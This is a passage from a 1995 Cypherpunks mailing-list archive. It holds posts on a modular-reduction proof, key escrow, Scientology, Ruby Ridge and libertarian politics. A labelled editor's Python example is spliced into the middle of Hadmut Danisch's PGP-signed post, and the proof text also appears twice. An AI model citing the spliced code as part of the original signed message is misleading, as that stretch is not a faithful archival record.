-> Y[i] * U < B^(n+1) - U
-> Y[i] * U * B^(i-n-1) < F

Therefore after doing the addition Y < B^i + F

Check of the last step:
0 <= U < B^n   therefore   B^n < B^(n+1) - U <= B^(n+1)
Therefore in every loop B^(i-1) < F <= B^i  ->  Y-F < B^i

Partial Correctness:

Y = X
    [ Y = X mod modulus, Y < B^len(X) ]
K = B ^ (n+1) - U
    [ K = 0 mod modulus, B^n < K <= B^(n+1) ]
for (i=len(X)-1 ; i>n ; i--)
{
    [ Y = X mod modulus, Y < B^(i+1) ]
    F = B ^ (i-n-1) * K
    [ F = 0 mod modulus, B^(i-1) < F <= B^i ]
    [ 0 <= Y[i] < B ]
    [ Y[i] * F = 0 mod modulus, 0 <= Y[i] * F < B^(i+1) ]
    [ Y >= Y[i] * B^i  ->  Y >= Y[i] * F ]
    Y -= Y[i] * F
    [ Y = X mod modulus, Y < B^i + F (reason see above), Y >= 0 ]
    if ( Y >= B^i )
        Y -= F                   // again shrinking,
                                 // still the same mod modulus
    [ Y = X mod modulus, Y >= 0, Y < B^i ]
}
Last i was n+1, therefore Y = X mod modulus, Y >= 0, Y < B^(n+1)

This is not enough, Y < B^n is requested. The loop can't be done once more because i-n-1 would become negative.

k+1 was the length of X, and n the length of the modulus. You walk down from k to n+1. In every loop you remove one block of the number. This means you have to do len(X)-len(modulus) loops. In the pseudocode you do only len(X)-len(modulus)-1 loops. One loop seems to be missing. This may be a result of confusion whether your Y starts with Y[0] or Y[1].

I do understand the algorithm as:

n = len(modulus)
U = B^n mod modulus
K = B^n - U                      // = 0 mod modulus, 0 < K < B^n
Y = X
for(i=len(X)-1 ; i>= n ; i--)    // squeeze Block i in Number Y
{                                // Y < B ^ (i+1)
    F = B ^ ( i-n ) * K          // F = 0 mod modulus
    Y -= Y[i] * F                // subtract Y[i] * B^i, now Y < B ^ i
                                 // add the equivalent Y[i] * B^(i-n)*U <= F
                                 // now Y < B^i + F
    if ( Y >= B^i )
        Y -= F                   // now Y < B^i
}

Last i was n, therefore Y < B^n , Y = X mod modulus , but perhaps still Y >= modulus.

Ok, algorithm understood and agreed (after modifying the loop counter). Any more agreement or disagreements? 
Hadmut From sandfort at crl.com Thu Sep 7 08:09:54 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 7 Sep 95 08:09:54 PDT Subject: not a flame please read and think about this In-Reply-To: <9509070626.AA07408@anon.penet.fi> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Thu, 7 Sep 1995 an116512 at anon.penet.fi wrote: > why is it that half the > people who post here work for the government or big companies that are doing > government's bidding (rand.org (which is part of the nsa!) att.com (makers of the clipper chip) > mit (which owns rsa) > netscape etc etc) I doubt the statistics and I don't see how mere employment with the above somehow disqualifies one for having a regard for privacy. In many cases, they have a much better grasp of the threat than the rest of us. > what makes me wonder isn't so much that they're here but that they post so-called > reasonable stuff that supports the government line. This is nonsense. Please give some examples of the sycophantic posts you claim support "the government line." > like when these people report on > what the nsa guy says at the crypto convention as if we're supposed to take it > seriously and these people who say clipper is good enough no back doors. > and then everyone takes this crap seriously. Who? When? To which "everyone" do you refer? > . . . aren't we supposed to be > cypherPUNKS? What the hell is that supposed to mean? The name was given and accepted in jest. I'm not aware of any special PUNK qualifications. Please elucidate. > then why do we need these people to think for us? The Cypherpunks I know certainly don't; sorry to hear about you. Are you planning to show up at Saturday's anniversary meeting again, Larry? 
S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From patrick at Verity.COM Thu Sep 7 08:11:36 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 7 Sep 95 08:11:36 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: <9509071507.AA08037@cantina.verity.com> > My personal view is co$ deserves all the flak they get. I know who you're referring to by saying co$, but what does co$ mean? Co-DollarSign? Co-Dollar? Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From jamesd at echeque.com Thu Sep 7 08:22:03 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 7 Sep 95 08:22:03 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509071521.IAA07990@blob.best.net> At 06:05 AM 9/7/95 -0400, Duncan Frissell wrote: > Well, if crypto reduces the role of government in human affairs, it will > reduce work for lawyers. Telecoms will certainly break the professional > monopoly of lawyers (and other professionals). The functional equivalent of lawyers will still have a role. When an escrow agent allocates large chunks of money in some fashion, and somebody says X was bad, and X says that Y was bad, and the reputations are worth real money, we will need a public examination to determine what really happened. And if governments collapse entirely, and we get full bore anarchy, lawyers will have even more work because instead of a few reputations being worth large sums of cash, everyone's reputation will be worth life and limb. 
 ---------------------------------------------------------------------
 We have the right to defend ourselves   |   http://www.jim.com/jamesd/
 and our property, because of the kind   |
 of animals that we are. True law        |   James A. Donald
 derives from this right, not from the   |
 arbitrary power of the state.           |   jamesd at echeque.com

From trei at process.com Thu Sep 7 08:23:13 1995
From: trei at process.com (Peter Trei)
Date: Thu, 7 Sep 95 08:23:13 PDT
Subject: Notes from NIS&T Key Escrow Export conference.
Message-ID: <9509071523.AA12261@toad.com>

>The last issue in the session was that the length of the key, 64-bits,
>was defined in criteria #1. There was no discussion at the conference on
>this criteria. It seems that the NIS&T and NSA folks believe that this is a
>closed topic. The folks in the session did not agree. They felt that 64-bits
>was not enough.

I hope this gets to you before the conference is over. I would REALLY like
to hear the government response to the question:

"If keys are escrowed, what purpose does a 64 bit limit serve?"

Secondarily, I observe that this apparently precludes the use of OTP.

Peter Trei
ptrei at acm.org

From danisch at ira.uka.de Thu Sep 7 08:32:59 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Thu, 7 Sep 95 08:32:59 PDT
Subject: fast modular reduction (proof?)
Message-ID: <9509071531.AA01869@elysion.iaks.ira.uka.de>

-----BEGIN PGP SIGNED MESSAGE-----

> In the following pseudocode, B is the radix in which the numbers are
> represented (2^32 for a 32-bit machine), n is the length of modulus in
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1
> is the length of X, and Y is the result.
>
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)

To do a proof I rewrite the algorithm:

n = len(modulus)              // modulus < B^n
Y = X                         // obviously Y = X mod modulus
K = B ^ (n+1) - U             // U = B ^ (n+1) mod modulus,
                              // therefore K = 0 mod modulus
                              // furthermore K > 0
for (i=len(Y)-1 ; i>n ; i--)
{
  F = B ^ (i-n-1) * K         // F > 0
                              // F = 0 mod modulus
  Y -= Y[i] * F               // Y shrinking, but
                              // Y still the same mod modulus
  if ( Y >= B^i )
    Y -= F                    // again shrinking,
                              // still the same mod modulus
}

This shows that Y was shrinking, but is still equal to X mod modulus.

To see whether Y really shrinks enough:

Y = sum(i=0..len(Y)-1) Y[i] * B^i

In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what
could be done fast by reducing the length of Y). Now Y < B^i

Afterwards the same value mod modulus is added to keep Y constant:
Y = Y + Y[i] * U * B^(i-n-1).

Y[i] < B  ->  Y[i]+1 <= B
U < modulus < B^n , therefore U < B^n
-> (Y[i]+1) * U < B * B^n = B^(n+1)
-> Y[i] * U < B^(n+1) - U
-> Y[i] * U * B^(i-n-1) < F

Therefore after doing the addition Y < B^i + F

Check of the last step:

0 <= U < B^n therefore B^n < B^(n+1) - U <= B^(n+1)

Therefore in every loop B^(i-1) < F <= B^i
-> Y-F < B^i

Partial Correctness:

Y = X
    [ Y = X mod , Y < B^len(X) ]
K = B ^ (n+1) - U
    [ K = 0 mod , B^n < K <= B^(n+1) ]
for (i=len(X)-1 ; i>n ; i--)
{
    [ Y = X mod , Y < B^(i+1) ]
  F = B ^ (i-n-1) * K
    [ F = 0 mod , B^(i-1) < F <= B^i ]
    [ 0 <= Y[i] < B ]
    [ Y[i] * F = 0 mod , 0 <= Y[i] * F < B^(i+1) ]
    [ Y >= Y[i] * B^i -> Y >= Y[i] * F ]
  Y -= Y[i] * F
    [ Y = X mod , Y < B^i + F (reason see above) , Y >= 0 ]
  if ( Y >= B^i )
    Y -= F                    // again shrinking,
                              // still the same mod modulus
    [ Y = X mod , Y >= 0 , Y < B^i ]
}

Last i was n+1, therefore Y = X mod , Y >= 0 , Y < B^(n+1)

This is not enough, Y < B^n is requested.
The loop can't be done once more because i-n-1 would become negative.

k+1 was the length of X, and n the length of the modulus. You walk down
from k to n+1 . In every loop you remove one block of the number.
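[Editor's added example, not part of Hadmut's post and not code from the author of the quoted pseudocode.] The Python below implements steps 1-4 exactly as quoted (i from k down to n+1, U = B^(n+1) mod modulus) and asserts the bounds from the proof above on every round: Y < B^(i+1) at the top of the loop, 0 <= Y < B^i + F after step 3, 0 <= Y < B^i after step 4, and Y = X mod modulus throughout. `self_check` confirms over random inputs that the loop ends with Y < B^(n+1) after exactly len(X)-n-1 rounds. The helper names (`block`, `nblocks`, `reduce_blocks`, `full_residue`, `self_check`) and the sample values (B = 10, modulus = 7) are constructed for this example; the trailing `% modulus` in `full_residue` is my own way of finishing the reduction and is not part of the quoted algorithm.

```python
# Editor's worked example (not code from Hadmut's post or from the quoted
# pseudocode's author): steps 1-4 of the quoted block-wise reduction, with
# the invariants from the proof checked on every iteration.  The helper
# names (block, nblocks, reduce_blocks, full_residue, self_check) and the
# sample values (B = 10, modulus = 7) are constructed for this example.
import random


def block(y, i, B):
    """Block i of y in radix B, i.e. Y[i] in the post's notation."""
    return (y // B**i) % B


def nblocks(y, B):
    """Number of radix-B blocks needed to hold y (len(Y) in the post)."""
    count = 0
    while y:
        y //= B
        count += 1
    return count


def reduce_blocks(X, modulus, B=2**32):
    """Run the quoted loop: i from k down to n+1, one block squeezed per round.

    Returns (Y, rounds).  On exit Y == X (mod modulus) and Y < B^(n+1);
    the proof's bounds are asserted at each step, so a violation raises
    AssertionError instead of silently producing a wrong residue.
    """
    n = nblocks(modulus, B)            # modulus < B^n
    assert 0 < modulus < B**n
    U = B**(n + 1) % modulus           # U = B^(n+1) mod modulus
    K = B**(n + 1) - U                 # K == 0 (mod modulus), B^n < K <= B^(n+1)
    Y = X
    k = nblocks(X, B) - 1              # k+1 = len(X)
    rounds = 0
    for i in range(k, n, -1):          # i = k, k-1, ..., n+1
        assert Y < B**(i + 1)          # loop-top invariant from the proof
        F = B**(i - n - 1) * K         # F == 0 (mod modulus), B^(i-1) < F <= B^i
        Yi = block(Y, i, B)
        # Step 3: drop the top block and add back the same value mod modulus.
        # Yi*F == Yi*B^i - Yi*U*B^(i-n-1), so this is exactly
        # Y - Yi*B^i + Yi*U*B^(i-n-1).
        Y -= Yi * F
        assert 0 <= Y < B**i + F
        # Step 4: at most one more subtraction of F brings Y below B^i.
        if Y >= B**i:
            Y -= F
        assert 0 <= Y < B**i
        assert Y % modulus == X % modulus
        rounds += 1
    return Y, rounds


def full_residue(X, modulus, B=2**32):
    """The quoted loop stops at Y < B^(n+1); finishing with a plain
    remainder is this example's addition, not part of the quoted algorithm."""
    Y, _ = reduce_blocks(X, modulus, B)
    return Y % modulus


def self_check(trials=300, B=256, seed=1):
    """Randomised check of the proof's conclusion: Y == X mod modulus,
    Y < B^(n+1), and exactly len(X)-n-1 rounds (0 if X is already short)."""
    rng = random.Random(seed)
    for _ in range(trials):
        n = rng.randint(1, 4)
        modulus = rng.randrange(B**(n - 1), B**n)     # exactly n blocks
        X = rng.randrange(0, B**rng.randint(n, 10))
        Y, rounds = reduce_blocks(X, modulus, B)
        if Y % modulus != X % modulus or Y >= B**(n + 1):
            return False
        if rounds != max(0, nblocks(X, B) - n - 1):
            return False
    return True


if __name__ == "__main__":
    print(reduce_blocks(12345, 7, 10))   # (95, 3): three blocks squeezed, Y < 10^2
    print(reduce_blocks(999, 7, 10))     # (19, 1): the step-4 subtraction fires
    print(full_residue(12345, 7, 10))    # 4
    print(self_check())                  # True
```

With B = 10 and modulus 7 (n = 1) the loop on X = 12345 runs three rounds (i = 4, 3, 2) and stops at Y = 95, which is below B^(n+1) = 100 but still above the modulus; the example with X = 999 is chosen so that the conditional subtraction in step 4 actually fires. Any production use should replace the `% modulus` finish with a proper last step, since the quoted loop alone leaves one block more than the modulus has.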
This means you have to do len(X)-len(modulus) loops. In the pseudocode you
do only len(X)-len(modulus)-1 loops. One loop seems to be missing.

This may be a result of confusion whether your Y starts with Y[0] or Y[1].

I do understand the algorithm as:

n = len(modulus)
U = B^n mod modulus
K = B^n - U                     // = 0 mod modulus, 0 < K < B^n
Y = X
for(i=len(X)-1 ; i>= n ; i--)   // squeeze Block i in Number Y
{                               // Y < B ^ (i+1)
  F = B ^ ( i-n ) * K           // F = 0 mod modulus
  Y -= Y[i] * F                 // subtract Y[i] * B^i, now Y < B ^ i
                                // add the equivalent Y[i] * B^(i-n)*U <= F
                                // now Y < B^i + F
  if ( Y >= B^i )
    Y -= F                      // now Y < B^i
}

Last i was n, therefore Y < B^n , Y = X mod modulus , but perhaps still
Y >= modulus.

Ok, algorithm understood and agreed (after modifying the loop counter).

Any more agreements or disagreements?

Hadmut

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME8QImc1jG5vDiNxAQFREgQAiMWfgy3bZtPckCNToAvKP7A+JevlnrqG
wJT6/111656nAZHDF5Htr2vwPEmiR522IvPKMG2MnOanMIRn2bgBYG3GECA3zlDo
ZnXNT1OXdtZzv848WPryLVjSJrrVTX/PUN9d6LaTqLBP5pZXwAYkO5kLU6/WP6yL
tF+fniXDZvk=
=Ev0S
-----END PGP SIGNATURE-----

From frissell at panix.com Thu Sep 7 08:34:01 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 7 Sep 95 08:34:01 PDT
Subject: Force Ratios
Message-ID: <199509071447.KAA28579@panix.com>

Wednesday night's ABC magazine program on Ruby Ridge was a great example of
what TV can be but so rarely is. Lots of chopper shots of Ruby Ridge. Lots
of hand held camera recreations and interviews with the Weavers and the
sniper (face obscured because he has something to hide), etc.

But the most interesting thing that this emphasized for me was the sort of
modern information warfare issues as highlighted in the recent Economist
Survey. Info war is war by other means (a little shooting, communications,
publicity, and litigation) and look what happened at Ruby Ridge.

The Feds deployed 400 "troopies", some armored personnel carriers, copters,
executive jets, Hummers, and other hardware.
On the other side were 3 adults and 4 children with some 14 personal weapons. The result. One Fed and two Weavers dead. A $3.1 million legal settlement, and continuing problems for the Feds. That smells like a bad defeat to me. They couldn't even kill 7 people with a 57 to 1 force ratio. In addition, the operation and the various investigations must have cost the Feds millions more. (What *do* the Fibbies have to pay for those Ninja Hoods?) And they lost. That suggests that the ability of The Great Enemy to overcome the sort of directed human activity of the frictionless markets we are building will be quite limited. DCF "Your Honor, the Defense will rest without calling any witnesses. No witnesses we could put on the stand could do as good a job setting forth the Defense case as the Government's witnesses have already done." -- Gerry Spence at the conclusion of the Government's case in US vs. Weaver. From liberty at gate.net Thu Sep 7 08:39:14 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 7 Sep 95 08:39:14 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) Message-ID: <199509071535.LAA49458@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- "Josh M. Osborne" writes: >Even if we were in a more libertarian society you run the risk of >being boycotted by potential customers (of corse the analagy breaks >down somewhat, in a very libertarian society oyu might be able to >run a profatable ISP selling to the very nich market of people who >want to threten, harass, or generally make a nuicence of themselves). > As the list's designated "very libertarian" advocate, I must object. Here is what you must sign to become a member of the Libertarian Party: "I hereby certify that I do not believe in or advocate the initiation of force as a means of achieving political or social goals." Libertarian Pledge required for membership. ___________________________. 
To "to threten, harass, or generally make a nuicence"[SIC] of himself, one must violate this pledge, and there would no-doubt still be legal results. This points up the difference between libertaria (not utopia) and anarchy. Anything _DOESN'T_ go in libertaria. If you see a victim, there's almost certainly a crime, and if someone chose to threaten, harass, etc. me, I would want it so. Of course, there are exceptions. For example: If I join a mailing list which sometimes "harasses" me due to insufficient spell-checking/proof-reading of certain posts, there might still be the common-law defense that Jim Ray "came to the nuisance," and therefore I am still not due any compensation. I can always unsubscribe, and some people probably wish I would. ;) [NOTE: IANAL!] JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBME8RWm1lp8bpvW01AQHXVgP9GsUelVcy4BFo/qt+Gm2JqdaHOlGUAvnP eFWXXT7hhzuC5Lz7vdBOb7itNGVahOVmDWPZxAbGJd/sJtd7YAfn4I8uMCiFieXZ dG7atBLLB66tBcsLYq/gXABHg2Z+MMojTf8A5XXCdqCJl4KoeaVckOEnKjR6uoCE Q9WrJiykH8Y= =xdDV -----END PGP SIGNATURE----- Regards, Jim Ray "As sensitive and broad-minded humans, we must never allow ourselves to be in any way judgmental of the religious practices of other people, even when these people clearly are raving space loons." -- Dave Barry ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ------------------------------------------------------------------------ Support Phil! 
email zldf at clark.net or see http://www.netresponse.com/zldf ________________________________________________________________________ From hallam at w3.org Thu Sep 7 08:50:22 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 7 Sep 95 08:50:22 PDT Subject: ON OFF-TOPIC In-Reply-To: <199509070639.BAA00416@mail.socketis.net> Message-ID: <9509071545.AA05172@zorch.w3.org> > THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY! Of course not, but I don't think that the 1776 result is up for review. This isn't about crypto nor about the social effects of crypto. Its just another looney conspiracy theory. Phill From bdavis at thepoint.net Thu Sep 7 08:55:48 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 08:55:48 PDT Subject: Zimmerman's statute In-Reply-To: Message-ID: On Fri, 1 Sep 1995, Alan Westrope wrote: > On Fri, 01 Sep 1995, Michael Froomkin wrote: > > > I think he would have to be charged first. Have I missed something? > > PS when does the statute of limitations run out? > > June '96. Zimmermann and Dubois appeared on a local talk radio show > recently; a friend happened to catch the program, taped it, and played > excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois. I wouldn't be so sure. There are lots of "creative" ways to, in effect, extend the statute. My personal sense is that DOJ eventually wants to get this over with, so presumably would not attempt to be so "creative." The "usual" statute of limitations for federal crimes is 5 years, but conspiracy, RICO, bank fraud, tax offenses, and no doubt others that don't occur to me right now, muddy the 5 year statute. Bank fraud, for example, has a 10 year statute. EBD From bdavis at thepoint.net Thu Sep 7 08:56:12 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 08:56:12 PDT Subject: GAK In-Reply-To: Message-ID: On Fri, 1 Sep 1995, Timothy C. 
May wrote: > At 10:56 PM 9/1/95, Buford Terrell wrote: > > >If you've ever watched Not_at_all_Funny Home Videos or any of the > >American Urinal school of tabloid television, you soon start feeling > >that the real threat to privacy is not the guvmint, but all of > >the yoyos with their little cam corders running around pointing them > >at people. > > > >Security cameras in ATMS and at airline ticket counters do more > >to threaten you privacy than do FIBBIE wiretaps, and PGP won't > >protect you from them. (and usually neither will the courts). > > I absolutely agree with this, though this doesn't mean I'll stop worrying > about the government's plans for key escrow (GAK), about limits on key > lengths, or about other efforts to thwart strong security. I, of course, know of the "dislike" of GAK here. I am curious to know, however, if the "dislike" is because government would have access under any circumstances or if the primary worry is that government will cheat and get access when most would agree that they shouldn't (either by the judge "cheating" or a TLA stealing it). In other words ... if it took agreement by a review board composed of non-LEA members of this list, would the escrow be acceptable?? EBD From ghio at cmu.edu Thu Sep 7 08:59:59 1995 From: ghio at cmu.edu (Matthew Ghio) Date: Thu, 7 Sep 95 08:59:59 PDT Subject: Another Son of Clipper discussion paper In-Reply-To: Message-ID: Mike McNally (m5 at dev.tivoli.com) wrote: : Lucky Green writes: : > Windows 95 is on a lot of people's hard drives. It is therefore public : > and available for every one's inspection. How many people do you know : > that have reverse engineered Windows 95. How many of those use a : > reverse engineered version. I'd venture it is zero out of zero. : : Problems with this analogy: : : 1) Windows 95 is somewhat bigger than your typical encryption : routine; : : 2) The factor of motivation isn't considered. 
If one is motivated enough to want source code to their operating system,
then they are motivated enough to dump Windows and download Linux or BSD.
The only reason to reverse-engineer Windows 95 is to produce applications
which are able to interoperate with Windows software in an unintended
manner, and the only reason to want to do this (instead of writing a version
for an open platform) is because Windows is standard on many PCs.

The same applies to GAK. There is no reason to hack it when you can just
use PGP instead. The only reason to hack it would be if it became a
standard. If we have to start hacking GAK applications, we've already
lost to a degree. Thus our focus should be on making alternatives
available instead of just attacking GAK. (Although I suppose you could
show how to hack it, for the sake of making a political statement.)

From hallam at w3.org Thu Sep 7 09:10:00 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 7 Sep 95 09:10:00 PDT
Subject: Cybersecurity
In-Reply-To: <199509071329.JAA06512@panix.com>
Message-ID: <9509071605.AA05479@zorch.w3.org>

>It was very much on the side of those seeking privacy, presenting
>the government (even in the UK they are looking at mandatory key escrow, but
>they haven't exactly told British subjects about it) as being underhand,
>sneaking around to find ways of removing the privacy of the individual.

The UK government looks at many things. Just because the US govt wants to
do something daft and the UK wants to watch does not mean the UK wants to
emulate it. The UK Labour party is opposed to key escrow "we do not accept
the "clipper chip" argument". The Tories have less than half the level of
popular support and are barely recognisable as a government.
Phill From bdavis at thepoint.net Thu Sep 7 09:15:36 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 09:15:36 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: Message-ID: On Tue, 5 Sep 1995, Black Unicorn wrote: > On Mon, 4 Sep 1995, Jeff Simmons wrote: > > > > > Here's a prediction: within one year, we will see the advent of Micro$oft's > > "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by > > Micro$oft itself, or a flat-out trap door. ANY communications with a > > Windoze box or network will have to use it, or loose the market. > > > It's here already. > It's called "lotus notes." > > > > About the > > same time, Justice will suddenly 'loose interest' in its various > > investigations of M$. Micro$oft will probably give it away for free as part > > of the Windows 95.702 upgrade. > > Wait a few months. Justice is boring of the investigation even now. I hope this doesn't mean the Department is switching to Microsoft Word! :-) (In fact, we're about to go to WP6.0 for Windows. And the 6.0 is not a typo.) > > -- > > Jeff Simmons jsimmons at goblin.punk.net EBD From frissell at panix.com Thu Sep 7 09:17:12 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 09:17:12 PDT Subject: Collection of personal info Message-ID: <199509071616.MAA04473@panix.com> At 09:20 PM 9/6/95 -0500, Mac Norton wrote: >Well, scratch me deeply enough, I'm not sure I'd disagree >with Tim, "philosophically speaking." The problem is, as >all the truly wise philosophers recognized, we must live >in the world. And given the number of us who must do so, >that entails rules. That's what so nice about the nets. You don't (won't) have to "live in the world" any more. The creation of consentual halucinations (virtual worlds) allows you to "change the world" at will. And once the interface improves... 
Actually, the creation of separate "spaces" that can only be entered with your (each person's) permission will have a big impact on life in the real world. DCF "If you don't want TRW to know what you're doing, lie." From mark at lenox.com Thu Sep 7 09:31:21 1995 From: mark at lenox.com (Mark Contois) Date: Thu, 7 Sep 95 09:31:21 PDT Subject: GAK In-Reply-To: Message-ID: <199509071628.MAA07681@tempest.lenox.com> > In other words ... if it took agreement by a review board composed of > non-LEA members of this list, would the escrow be acceptable?? > > EBD Speaking for myself only, of course, mandatory key escrow under *any* circumstances is a Bad Thing. I don't want anyone to have my secret key/passphrase, even if 'anyone' consists of n respected cypherpunks. (How are we supposed to tell whether they're LE, anyway? I possess a high degree of confidence, for example, that Tim May is not an undercover spook. But that doesn't stop various tentacles^H^H^H^H^H^H^H^H^H anonymous posters from expressing assertions to the contrary.) If I *give* my key to an escrow agent, of course, that's a different story. ("Mr. Cheatem, in the event of my death or disappearance, please decrypt this file with the enclosed key and fax it to the Washington Post.") But I certainly don't want to allow my key to reside with an agent who could be forced to turn it over on the basis of a court order. Sorry if I'm repeating an earlier discussion. Mark -- Mark Contois * The Lenox Group * Boston, MA * http://www.lenox.com/~mark/ Finger for PGP public key * Stellar Crisis: http://www.lenox.com/games/sc Cypherpunks: Share and deploy ********* NSA: Go stick your head in a pig. From perry at piermont.com Thu Sep 7 09:34:06 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Thu, 7 Sep 95 09:34:06 PDT Subject: not a flame please read and think about this In-Reply-To: Message-ID: <199509071633.MAA04493@frankenstein.piermont.com> Sandy Sandfort writes: > On Thu, 7 Sep 1995 an116512 at anon.penet.fi wrote: > > > why is it that half the people who post here work for the > > government or big companies that are doing governments bidding > > (rand.org (which is part of the the nsa!) att.com (makers of the > > clipper chip) mit (which onwns rsa) netscape etc etc) > > I doubt the statistics and I don't see how mere employment with > the above somehow disqualifies one for having a regard for > privacy. anonymous idiot doesn't even have his facts right. VLSI and Mykotronix (sp?) make the EES chips. Rand doesn't do much NSA research (although there are other companies that do) and MIT doesn't have any real rights to RSA given the PKP agreements. In any case, who gives a damn? Perry From zinc at zifi.genetics.utah.edu Thu Sep 7 09:49:06 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Thu, 7 Sep 95 09:49:06 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: <9509071507.AA08037@cantina.verity.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 7 Sep 1995, Patrick Horgan wrote: > Date: Thu, 7 Sep 1995 08:07:39 -0700 > From: Patrick Horgan > To: cg at bofh.lake.de, mark at lochard.com.au > Cc: cypherpunks at toad.com > Subject: Re: Scientology and police visit XS4ALL Amsterdam > > > My personal view is co$ deserves all the flak they get. > > I know who you're referring to by saying co$, but what do co$ mean? > Co-DollarSign? Co-Dollar? > CO$ is _C_hurch _O_f _$_cientology L. Ronboy the telepath Hubbards biggest joke. 
- -pjf -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBME8hqE3Qo/lG0AH5AQGFkAQAikXaF7nCJ99+XBONXKcvBTO7lMZn+wEZ l9+YZOI6QLZNY/f/HB5mOorwn340lgED0y/RjoT9ctoXwVW9bNSZZ68lQm7k72wO Ymz1NxHfwQRq8FNiUZnKmz+Wb/YHpAwGhvvPfocA+rLupdd9x/9BSm047RDgwgvX MVEx4B5C8wI= =ot1t -----END PGP SIGNATURE----- From tcmay at got.net Thu Sep 7 10:10:01 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 10:10:01 PDT Subject: Why Key Escrow (GAK) is So Bad Message-ID: At 1:25 AM 9/4/95, Brian Davis wrote: >On Fri, 1 Sep 1995, Timothy C. May wrote: >> I absolutely agree with this, though this doesn't mean I'll stop worrying >> about the government's plans for key escrow (GAK), about limits on key >> lengths, or about other efforts to thwart strong security. > >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). > >In other words ... if it took agreement by a review board composed of >non-LEA members of this list, would the escrow be acceptable?? [I'm addressing the basic issue of key escrow, or what Carl Ellison calls "GAK" (Government Access to Keys), not the current debate in D.C. about using some form of key escrow for exportable crypto. The debate on key escrow is really about the crypto citizens will use, not what will be allowed to be exported.] Speaking for myself--though I think this captures the feelings of many--my objection to GAK is on *principle*: * No government can tell me what language I must communicate in and what language I must _not_ communicate in. David Sternlight has characterized this position as "childish," as the whinings of spoiled children who don't want to be told what to do. 
If so, then Thomas Jefferson was surely the biggest child of all, as he and his compatriots developed and used secret codes for communications. No doubt King George would have found GAK quite useful. No, the point is really about whether people may speak and write in the languages they wish, or be ordered to speak and write in ways the government can monitor, with or without the "speed bump" of key escrow and court orders to release the escrowed keys. (Ironically, I just heard about a case in Texas where a judge ordered a mother to stop speaking in Spanish to her child at home, calling it "child abuse." The implications of this are self-evident.) "Escrow" of communications keys, when commanded by the government, is no different than requiring that all locks have duplicate keys "escrowed" with the police, or that all curtains and window shades have a special "invisibility mode" that "law enforcement" can enable under certain circumstances. "Key escrow," or GAK, is to most of us equivalent to universal wiretapping. Why not tape-record all calls and "escrow" the result?. Why not mount surveillance cameras in homes and "escrow" the result? All are essentially equivalent. The pernicious nature of the "escrow" idea, which I have to admit is a new twist on the surveillance state that was not anticipated by Orwell, Brunner, or any of the other writers on this topic, is that it says that surveillance is not so bad after all, because the results of the escrow will not be looked at except when "justified." By whom? And by what conceivable right can the government tell me I may not use the communication system and language of my choice? I have no doubt that such key escrow, or recording of all calls, or surveillance cameras, with escrowed results, would "stop" some crimes. Maybe even some serious crimes, even horrific crimes. So what? 
In a free society, we don't tell people what language they may speak in, and with whom, nor did we place microphones and cameras in their presence, even if we "escrow" the results and promise not to look unless a judge or a review panel says it's OK. There are undoubtedly crimes that would be stopped if surveillance cameras were placed in many places, private and public, with "video escrow." Friends of mine are developing micropower, tiny, ultrawideband radio "localizers," that could be used by parents to keep track of children, pets, luggage, etc. I have long joked with them about "position escrow," where the government will mandate that all citizen-units wear these devices (or have them implanted) so that their positions can be monitored. Would an "escrow" system make it any less unacceptable? The arguments for "position escrow," once the technology becomes available (surely by 1998-9) are very similar to those being made for communications escrow. Lots of crimes would be solved, and even OJ might be convicted, if a court could order the "position escrow" files opened. So what? That's now what a free society is about. The basic principle is the issue. There are 